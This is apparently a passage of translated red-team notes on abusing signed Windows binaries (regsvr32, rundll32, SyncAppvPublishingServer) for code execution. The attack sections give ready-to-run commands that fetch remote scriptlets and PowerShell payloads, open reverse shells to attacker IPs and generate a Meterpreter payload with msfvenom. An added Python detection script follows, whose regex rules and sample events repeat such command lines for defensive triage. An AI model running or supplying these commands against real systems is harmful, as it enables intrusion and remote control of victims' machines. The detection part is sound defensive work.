C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll
A Meterpreter session is obtained
regsvr32
Environment
Attacking machine: Kali (192.168.243.133)
Victim: Win7 x64 (192.168.243.154)
Tool: https://github.com/Hood3dRob1n/JSRat-Py.git
1. Run JSRat.py on Kali:
python JSRat.py -i 192.168.243.133 -p 3333
2. On the victim, run:
regsvr32.exe /u /n /s /i:http://192.168.243.133:3333/file.sct scrobj.dll
3. Kali obtains the victim's shell
Rundll32
Environment
Attacking machine: Kali (192.168.243.133)
Victim: Win7 x64 (192.168.243.154)
Procedure
rundll32 AllTheThings.dll,EntryPoint
rundll32 javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://reverse-tcp.xyz/payload.sct");window.close();
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.100.18.20 -Port 3333;"
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
Scripting
Environment
Attacking machine: Kali (192.168.243.133)
Victim: Win7 x64 (192.168.243.154)
Procedure
VBS: generate the VBS code
Bat: generate the batch (.bat) file
Run it on the target host
Empire obtains an agent
Run system commands
2. JScript
https://gist.github.com/homjxi0e/0d683007bd4a3ce39d3e19342aaa68ec
SyncAppvPublishingServer
Environment
Attacking machine: Kali (192.168.243.133)
Victim: Win7 x64 (192.168.243.154)
Procedure
1. msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.100.19.19 LPORT=4444 -f psh-reflection > 4444.ps1
2. SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://10.100.19.19/4444.ps1');4444.ps1 | IEX"
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.100.19.19/4444.ps1');4444.ps1"
Not reproduced successfully
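Every technique in these notes, from cmstp through SyncAppvPublishingServer, shows up on the endpoint the same way: a signed Windows binary started with a command line it normally never receives, which is exactly what process-creation telemetry records. The script below is an added example, not code from the original notes; it applies rules written from the command lines in the sections above to Sysmon-style Event ID 1 records (Image and CommandLine fields). The events, the 192.0.2.x addresses and the file names are constructed, and the ATT&CK IDs are the public sub-technique numbers for these binaries.

```python
"""Command-line triage for the signed-binary techniques collected in these notes.

Added example, not part of the original page. It checks Sysmon-style process
creation records (the Image and CommandLine fields of Event ID 1) against
rules written from the command lines shown in the sections above: cmstp,
regsvr32, mshta, rundll32, msiexec, regsvcs/regasm, InstallUtil, control.exe,
forfiles, pcalua, InfDefaultInstall, IEExec, SyncAppvPublishingServer and the
PowerShell download cradle. The events and the 192.0.2.x addresses are
constructed; the ATT&CK IDs are the sub-technique numbers for these binaries.
"""
import re

# (rule name, pattern the image basename must fully match, command-line pattern)
RULES = [
    ("T1218.003 CMSTP loading an INF", r"cmstp\.exe", r"/s\b.*\.inf"),
    ("T1218.010 Regsvr32 remote scriptlet", r"regsvr32\.exe", r"/i:\S*https?://|scrobj\.dll"),
    ("T1218.005 Mshta remote or inline script", r"mshta\.exe", r"https?://|javascript:|vbscript:"),
    ("T1218.011 Rundll32 script host", r"rundll32(\.exe)?", r"javascript:|RunHTMLApplication"),
    ("T1218.007 Msiexec remote package", r"msiexec(\.exe)?", r"/i\s+https?://"),
    ("T1218.009 Regsvcs/Regasm loading a DLL", r"reg(svcs|asm)\.exe", r"\S+\.dll"),
    ("T1218.004 InstallUtil uninstall entry point", r"installutil\.exe", r"/u\b"),
    ("T1218.002 Control Panel item launched by path", r"control(\.exe)?", r"\.cpl"),
    ("T1202 Forfiles indirect execution", r"forfiles(\.exe)?", r"/c\s"),
    ("T1202 Pcalua indirect execution", r"pcalua\.exe", r"-a\s"),
    ("InfDefaultInstall with INF argument", r"infdefaultinstall\.exe", r"\.inf"),
    ("IEExec fetching a remote executable", r"ieexec\.exe", r"https?://"),
    ("SyncAppvPublishingServer script argument", r"syncappvpublishingserver\.exe", r"New-Object|\bIEX\b"),
    ("T1059.001 PowerShell download cradle", r"powershell(\.exe)?", r"DownloadString|\bIEX\b"),
]
COMPILED = [(name, re.compile(img, re.I), re.compile(cmd, re.I)) for name, img, cmd in RULES]


def image_basename(image):
    """Last path component of a Windows image path, regardless of host OS."""
    return image.replace("\\", "/").rsplit("/", 1)[-1]


def triage(event):
    """Return the names of all rules that fire on one process-creation event."""
    name = image_basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    return [rule for rule, img, cmd in COMPILED
            if img.fullmatch(name) and cmd.search(cmdline)]


def scan(events):
    """Return (event index, rule name) pairs for every hit across a batch."""
    return [(i, rule) for i, ev in enumerate(events) for rule in triage(ev)]


# Constructed events; only Image and CommandLine are needed for these rules
EVENTS = [
    {"Image": r"C:\Windows\System32\cmstp.exe", "CommandLine": "cmstp.exe /s cmstp.inf"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32.exe /u /n /s /i:http://192.0.2.10:3333/file.sct scrobj.dll"},
    {"Image": r"C:\Windows\System32\mshta.exe", "CommandLine": "mshta.exe http://192.0.2.10:80/1.hta"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": 'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";document.write();'},
    {"Image": r"C:\Windows\System32\msiexec.exe", "CommandLine": "msiexec /q /i http://192.0.2.10/calc.png"},
    {"Image": r"C:\Windows\System32\forfiles.exe",
     "CommandLine": r"forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"},
    {"Image": r"C:\Windows\System32\pcalua.exe", "CommandLine": r"C:\windows\system32\pcalua.exe -a notepad.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/s.ps1')"},
    {"Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe report.txt"},  # benign control
]

if __name__ == "__main__":
    for index, rule in scan(EVENTS):
        print(f"event {index}: {rule}")
```

Run as a script it prints one line per hit; triage() returns the matching rule names for a single record so the same table can be wired into a log pipeline. Matching on the image basename rather than the raw command line keeps a renamed copy of the binary from slipping past a rule, and the benign notepad record is there to show the rules stay quiet on ordinary process starts.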
Trusted Developer Utilities
40. WMI (T1047)